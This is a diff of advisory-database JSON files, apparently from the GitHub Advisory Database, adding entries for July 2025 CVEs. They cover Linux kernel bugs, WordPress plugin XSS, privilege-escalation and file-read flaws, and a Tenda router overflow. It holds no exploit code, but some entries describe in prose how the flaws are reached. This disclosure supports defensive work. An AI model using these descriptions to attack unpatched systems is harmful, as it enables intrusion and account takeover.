the function return null.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38362" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1ebcdf38887949def1a553ff3e45c98ed95a3cd0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/34d3e10ab905f06445f8dbd8a3d9697095e71bae" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4ce9f2dc9ff7cc410e8c5d936ec551e26b9599a9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5148c7ea69e9c5bf2f05081190f45ba96d3d1e7a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b3005145eab98d36777660b8893466e4f630ae1c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c3e9826a22027a21d998d3e64882fa377b613006" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json b/advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json index 48d08ed1746d2..3c21b3f3e4c5b 100644 --- a/advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json +++ b/advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m2xg-c7hm-9g82", - "modified": "2025-07-25T06:30:30Z", + "modified": "2025-07-25T15:30:46Z", "published": "2025-07-25T06:30:30Z", "aliases": [ "CVE-2025-7022" ], "details": "The My Reservation System WordPress plugin through 2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-25T06:15:23Z" diff --git a/advisories/unreviewed/2025/07/GHSA-m465-94wp-x2mq/GHSA-m465-94wp-x2mq.json b/advisories/unreviewed/2025/07/GHSA-m465-94wp-x2mq/GHSA-m465-94wp-x2mq.json new file mode 100644 index 0000000000000..1abf7a4525a2d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m465-94wp-x2mq/GHSA-m465-94wp-x2mq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m465-94wp-x2mq", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-51411" + ], + "details": "A reflected cross-site scripting (XSS) vulnerability exists in Institute-of-Current-Students v1.0 via the email parameter in the /postquerypublic endpoint. The application fails to properly sanitize user input before reflecting it in the HTML response. This allows unauthenticated attackers to inject and execute arbitrary JavaScript code in the context of the victim's browser by tricking them into visiting a crafted URL or submitting a malicious form. Successful exploitation may lead to session hijacking, credential theft, or other client-side attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51411" + }, + { + "type": "WEB", + "url": "https://github.com/tansique-17/CVE-2025-51411" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mg6f-qcc4-f2gp/GHSA-mg6f-qcc4-f2gp.json b/advisories/unreviewed/2025/07/GHSA-mg6f-qcc4-f2gp/GHSA-mg6f-qcc4-f2gp.json new file mode 100644 index 0000000000000..5e5a01fc5b568 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mg6f-qcc4-f2gp/GHSA-mg6f-qcc4-f2gp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg6f-qcc4-f2gp", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-7780" + ], + "details": "The AI Engine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.4. The simpleTranscribeAudio endpoint fails to restrict URL schemes before calling get_audio(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to read any file on the web server and exfiltrate it via the plugin’s OpenAI API integration.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7780" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ai-engine/tags/2.9.3/classes/api.php#L625" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ai-engine/tags/2.9.3/classes/engines/chatml.php#L829" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3332540" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/ai-engine/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/513274bc-3016-4adb-be78-b13c5fae9c03?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mh65-9fq4-rpg3/GHSA-mh65-9fq4-rpg3.json b/advisories/unreviewed/2025/07/GHSA-mh65-9fq4-rpg3/GHSA-mh65-9fq4-rpg3.json new file mode 100644 index 0000000000000..3ef81a49beb33 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mh65-9fq4-rpg3/GHSA-mh65-9fq4-rpg3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mh65-9fq4-rpg3", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-7745" + ], + "details": "Buffer Over-read vulnerability in ABB AC500 V2.This issue affects AC500 V2: through 2.5.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7745" + }, + { + "type": "WEB", + "url": "https://search.abb.com/library/Download.aspx?DocumentID=3ADR011432&LanguageCode=en&DocumentPartId=&Action=Launch" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-126" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T08:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mj73-cg42-f79h/GHSA-mj73-cg42-f79h.json b/advisories/unreviewed/2025/07/GHSA-mj73-cg42-f79h/GHSA-mj73-cg42-f79h.json new file mode 100644 index 0000000000000..c3cc923d91b14 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mj73-cg42-f79h/GHSA-mj73-cg42-f79h.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mj73-cg42-f79h", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38379" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with ->query_interface\nuninitialized, so we can't call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we're queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f> 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [] release_sock+0x21/0xf0", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38379" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0cee638d92ac898d73eccc4e4bab70e9fc95946a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3bbe46716092d8ef6b0df4b956f585c5cd0fc78e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3f6932ef25378794894c3c1024092ad14da2d330" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9d2b629a9dc5c72537645533af1cb11a7d34c4b1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mxc4-v7c2-8m69/GHSA-mxc4-v7c2-8m69.json b/advisories/unreviewed/2025/07/GHSA-mxc4-v7c2-8m69/GHSA-mxc4-v7c2-8m69.json new file mode 100644 index 0000000000000..f70a9514d0c85 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mxc4-v7c2-8m69/GHSA-mxc4-v7c2-8m69.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mxc4-v7c2-8m69", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38421" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86/amd: pmf: Use device managed allocations\n\nIf setting up smart PC fails for any reason then this can lead to\na double free when unloading amd-pmf. This is because dev->buf was\nfreed but never set to NULL and is again freed in amd_pmf_remove().\n\nTo avoid subtle allocation bugs in failures leading to a double free\nchange all allocations into device managed allocations.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38421" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0d10b532f861253c283863522d59d099fcb0796d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d9db3a941270d92bbd1a6a6b54a10324484f2f2d" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p347-69w9-6826/GHSA-p347-69w9-6826.json b/advisories/unreviewed/2025/07/GHSA-p347-69w9-6826/GHSA-p347-69w9-6826.json new file mode 100644 index 0000000000000..d8a92ee4b11fa --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-p347-69w9-6826/GHSA-p347-69w9-6826.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p347-69w9-6826", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38364" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmaple_tree: fix MA_STATE_PREALLOC flag in mas_preallocate()\n\nTemporarily clear the preallocation flag when explicitly requesting\nallocations. Pre-existing allocations are already counted against the\nrequest through mas_node_count_gfp(), but the allocations will not happen\nif the MA_STATE_PREALLOC flag is set. This flag is meant to avoid\nre-allocating in bulk allocation mode, and to detect issues with\npreallocation calculations.\n\nThe MA_STATE_PREALLOC flag should also always be set on zero allocations\nso that detection of underflow allocations will print a WARN_ON() during\nconsumption.\n\nUser visible effect of this flaw is a WARN_ON() followed by a null pointer\ndereference when subsequent requests for larger number of nodes is\nignored, such as the vma merge retry in mmap_region() caused by drivers\naltering the vma flags (which happens in v6.6, at least)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38364" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9e32f4700867abbd5d19abfcf698dbd0d2ce36a4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cf95f8426f889949b738f51ffcd72884411f3a6a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d69cd64bd5af41c6fd409313504089970edaf02f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e63032e66bca1d06e600033f3369ba3db3af0870" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/fba46a5d83ca8decb338722fb4899026d8d9ead2" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p8hf-2q7f-w7h9/GHSA-p8hf-2q7f-w7h9.json b/advisories/unreviewed/2025/07/GHSA-p8hf-2q7f-w7h9/GHSA-p8hf-2q7f-w7h9.json new file mode 100644 index 0000000000000..a99cd0b3f5f5d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-p8hf-2q7f-w7h9/GHSA-p8hf-2q7f-w7h9.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8hf-2q7f-w7h9", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38380" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ni2c/designware: Fix an initialization issue\n\nThe i2c_dw_xfer_init() function requires msgs and msg_write_idx from the\ndev context to be initialized.\n\namd_i2c_dw_xfer_quirk() inits msgs and msgs_num, but not msg_write_idx.\n\nThis could allow an out of bounds access (of msgs).\n\nInitialize msg_write_idx before calling i2c_dw_xfer_init().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38380" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3d30048958e0d43425f6d4e76565e6249fa71050" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/475f89e1f9bde45fc948589e7cde1f5d899ae412" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4c37963d67fb945a59faf53bebe048ca201e44df" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5b622e672e49e50c33fc64cd06b05ce76e1de460" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6358cb9c2a31e23b6b51bfcd7fe2b7becaf6b149" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9b5b600e751fae92ba571b015eaf02c9c58e2083" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pc8h-vv6v-5wqw/GHSA-pc8h-vv6v-5wqw.json b/advisories/unreviewed/2025/07/GHSA-pc8h-vv6v-5wqw/GHSA-pc8h-vv6v-5wqw.json new file mode 100644 index 0000000000000..1e353998fdb71 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pc8h-vv6v-5wqw/GHSA-pc8h-vv6v-5wqw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc8h-vv6v-5wqw", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-7695" + ], + "details": "The Dataverse Integration plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks within its reset_password_link REST endpoint in versions 2.77 through 2.81. The endpoint’s handler accepts a client-supplied id, email, or login, looks up that user, and calls get_password_reset_key() unconditionally. Because it only checks that the caller is authenticated, and not that they own or may edit the target account, any authenticated attacker, with Subscriber-level access and above, can obtain a password reset link for an administrator and hijack that account.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7695" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/integration-cds/trunk/src/API/AuthenticatedEndpoint.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/integration-cds/trunk/src/API/Endpoints/GetResetUserPasswordLink.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?new=3329717%40integration-cds%2Ftrunk&old=3323579%40integration-cds%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/integration-cds/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfd35a3c-7203-4832-8b0d-56f3e7983118?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pj7h-hw7v-pg79/GHSA-pj7h-hw7v-pg79.json b/advisories/unreviewed/2025/07/GHSA-pj7h-hw7v-pg79/GHSA-pj7h-hw7v-pg79.json new file mode 100644 index 0000000000000..1a7c093767fda --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pj7h-hw7v-pg79/GHSA-pj7h-hw7v-pg79.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj7h-hw7v-pg79", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38381" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: cs40l50-vibra - fix potential NULL dereference in cs40l50_upload_owt()\n\nThe cs40l50_upload_owt() function allocates memory via kmalloc()\nwithout checking for allocation failure, which could lead to a\nNULL pointer dereference.\n\nReturn -ENOMEM in case allocation fails.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38381" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4cf65845fdd09d711fc7546d60c9abe010956922" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e87fc697fa4be5164e47cfba4ddd4732499adc60" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ea20568895c1122f15b6fc9e8d02c6cbe22964f8" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pqf9-m843-ppvg/GHSA-pqf9-m843-ppvg.json b/advisories/unreviewed/2025/07/GHSA-pqf9-m843-ppvg/GHSA-pqf9-m843-ppvg.json new file mode 100644 index 0000000000000..6c8c1c5c7519a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pqf9-m843-ppvg/GHSA-pqf9-m843-ppvg.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqf9-m843-ppvg", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38398" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: spi-qpic-snand: reallocate BAM transactions\n\nUsing the mtd_nandbiterrs module for testing the driver occasionally\nresults in weird things like below.\n\n1. swiotlb mapping fails with the following message:\n\n [ 85.926216] qcom_snand 79b0000.spi: swiotlb buffer is full (sz: 4294967294 bytes), total 512 (slots), used 0 (slots)\n [ 85.932937] qcom_snand 79b0000.spi: failure in mapping desc\n [ 87.999314] qcom_snand 79b0000.spi: failure to write raw page\n [ 87.999352] mtd_nandbiterrs: error: write_oob failed (-110)\n\n Rebooting the board after this causes a panic due to a NULL pointer\n dereference.\n\n2. If the swiotlb mapping does not fail, rebooting the board may result\n in a different panic due to a bad spinlock magic:\n\n [ 256.104459] BUG: spinlock bad magic on CPU#3, procd/2241\n [ 256.104488] Unable to handle kernel paging request at virtual address ffffffff0000049b\n ...\n\nInvestigating the issue revealed that these symptoms are results of\nmemory corruption which is caused by out of bounds access within the\ndriver.\n\nThe driver uses a dynamically allocated structure for BAM transactions,\nwhich structure must have enough space for all possible variations of\ndifferent flash operations initiated by the driver. The required space\nheavily depends on the actual number of 'codewords' which is calculated\nfrom the pagesize of the actual NAND chip.\n\nAlthough the qcom_nandc_alloc() function allocates memory for the BAM\ntransactions during probe, but since the actual number of 'codewords'\nis not yet know the allocation is done for one 'codeword' only.\n\nBecause of this, whenever the driver does a flash operation, and the\nnumber of the required transactions exceeds the size of the allocated\narrays the driver accesses memory out of the allocated range.\n\nTo avoid this, change the code to free the initially allocated BAM\ntransactions memory, and allocate a new one once the actual number of\n'codewords' required for a given NAND chip is known.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38398" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/86fb36de1132b560f9305f0c78fa69f459fa0980" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d85d0380292a7e618915069c3579ae23c7c80339" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pqhv-fc7x-qjmr/GHSA-pqhv-fc7x-qjmr.json b/advisories/unreviewed/2025/07/GHSA-pqhv-fc7x-qjmr/GHSA-pqhv-fc7x-qjmr.json new file mode 100644 index 0000000000000..7486e16a0f99b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pqhv-fc7x-qjmr/GHSA-pqhv-fc7x-qjmr.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqhv-fc7x-qjmr", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38383" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/vmalloc: fix data race in show_numa_info()\n\nThe following data-race was found in show_numa_info():\n\n==================================================================\nBUG: KCSAN: data-race in vmalloc_info_show / vmalloc_info_show\n\nread to 0xffff88800971fe30 of 4 bytes by task 8289 on cpu 0:\n show_numa_info mm/vmalloc.c:4936 [inline]\n vmalloc_info_show+0x5a8/0x7e0 mm/vmalloc.c:5016\n seq_read_iter+0x373/0xb40 fs/seq_file.c:230\n proc_reg_read_iter+0x11e/0x170 fs/proc/inode.c:299\n....\n\nwrite to 0xffff88800971fe30 of 4 bytes by task 8287 on cpu 1:\n show_numa_info mm/vmalloc.c:4934 [inline]\n vmalloc_info_show+0x38f/0x7e0 mm/vmalloc.c:5016\n seq_read_iter+0x373/0xb40 fs/seq_file.c:230\n proc_reg_read_iter+0x11e/0x170 fs/proc/inode.c:299\n....\n\nvalue changed: 0x0000008f -> 0x00000000\n==================================================================\n\nAccording to this report,there is a read/write data-race because\nm->private is accessible to multiple CPUs. To fix this, instead of\nallocating the heap in proc_vmalloc_init() and passing the heap address to\nm->private, vmalloc_info_show() should allocate the heap.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38383" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5c5f0468d172ddec2e333d738d2a1f85402cf0bc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5c966f447a584ece3c70395898231aeb56256ee7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ead91de35d9cd5c4f80ec51e6020f342079170af" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pvf3-8pcq-8mjg/GHSA-pvf3-8pcq-8mjg.json b/advisories/unreviewed/2025/07/GHSA-pvf3-8pcq-8mjg/GHSA-pvf3-8pcq-8mjg.json new file mode 100644 index 0000000000000..2c482919d9d74 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pvf3-8pcq-8mjg/GHSA-pvf3-8pcq-8mjg.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvf3-8pcq-8mjg", + "modified": "2025-07-25T15:30:55Z", + "published": "2025-07-25T15:30:55Z", + "aliases": [ + "CVE-2025-8160" + ], + "details": "A vulnerability classified as critical has been found in Tenda AC20 up to 16.03.08.12. Affected is an unknown function of the file /goform/SetSysTimeCfg of the component httpd. The manipulation of the argument timeZone leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8160" + }, + { + "type": "WEB", + "url": "https://github.com/CH13hh/cve/blob/main/tenda1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317574" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317574" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620625" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:30Z" + } +} \ No newline at end of 